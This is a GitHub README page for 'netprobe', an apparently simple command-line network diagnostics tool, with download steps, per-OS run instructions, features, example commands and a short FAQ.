Skip to content

Latest commit

 

History

History
87 lines (66 loc) · 3.87 KB

File metadata and controls

87 lines (66 loc) · 3.87 KB
layout default
title 🌐 netprobe - Fast Network Diagnostics Made Easy
description 🔍 Diagnose network issues swiftly with NetProbe, a fast Rust tool that analyzes connections from DNS to HTTP in one command.

🌐 netprobe - Fast Network Diagnostics Made Easy

🚀 Getting Started

Welcome to netprobe! This tool helps you quickly check your network connection. With just one command, you can test DNS resolution, TCP connectivity, and HTTP status. Whether you are a system administrator or just someone who wants to keep their network healthy, netprobe simplifies troubleshooting.

🔗 Download Now

Download netprobe

📥 Download & Install

To download netprobe, simply visit this page: GitHub Releases Page. Here, you will find the latest version of the tool.

  1. Click on the version you want to download.
  2. You will see different files available.
  3. Choose the file that matches your operating system (Windows, macOS, Linux).
  4. Download the file to your computer.

Once downloaded, follow the instructions below to install and run netprobe.

🛠️ System Requirements

  • Operating System: Windows 10 or newer, macOS (latest version), or Linux (any recent distribution).
  • Storage Space: At least 50 MB of free disk space.
  • Memory: 512 MB RAM minimum.

📋 How to Run netprobe

Once you have downloaded the appropriate file:

For Windows Users:

  1. Navigate to the folder where you downloaded the netprobe executable file.
  2. Double-click the .exe file to open it. A command prompt window will appear.
  3. Type your command (for example, netprobe example.com) and press Enter. You will see the results immediately.

For macOS Users:

  1. Open Finder and go to the Downloads folder.
  2. Locate the downloaded .app file.
  3. Drag the file to your Applications folder.
  4. Open your Terminal app.
  5. Type netprobe followed by your command and press Enter to see the results.

For Linux Users:

  1. Open your terminal.
  2. Navigate to your Downloads folder using cd ~/Downloads.
  3. Make the file executable by running chmod +x netprobe.
  4. Now, run the command: ./netprobe example.com to check your connection.

🌀 Features

  • DNS Resolution: Quickly checks if a domain name links to the right IP address.
  • TCP Connectivity: Tests if you can reach a specific port on a server.
  • HTTP Status: Get immediate feedback on whether a web page is accessible or down.
  • JSON Support: Outputs results in a clear JSON format for easier reading and application.

⚙️ Common Commands

Here are some basic commands you can use with netprobe:

  • Check DNS Resolution: netprobe example.com
  • Test TCP Connectivity: netprobe -t example.com:80
  • HTTP Status: netprobe -h example.com

📖 Example

Here is a simple example of how to use netprobe:

netprobe example.com

You will receive a response that shows if the DNS resolution is successful and the IP address returned.

💬 FAQs

Q: Is netprobe free to use?
A: Yes, netprobe is completely free.

Q: Can I use netprobe without any installation?
A: Yes, it runs directly from the downloaded file without needing additional installation steps.

Q: What if I have issues running the tool?
A: Please check the troubleshooting section in the documentation or reach out on the GitHub page for help.

📚 Additional Resources

For more information and detailed usage instructions, please refer to the documentation in the GitHub repository. You can also report issues or suggest features there.

📌 Stay Updated

For updates and new features, keep an eye on the releases page: GitHub Releases Page.

Thank you for choosing netprobe as your network diagnostics tool!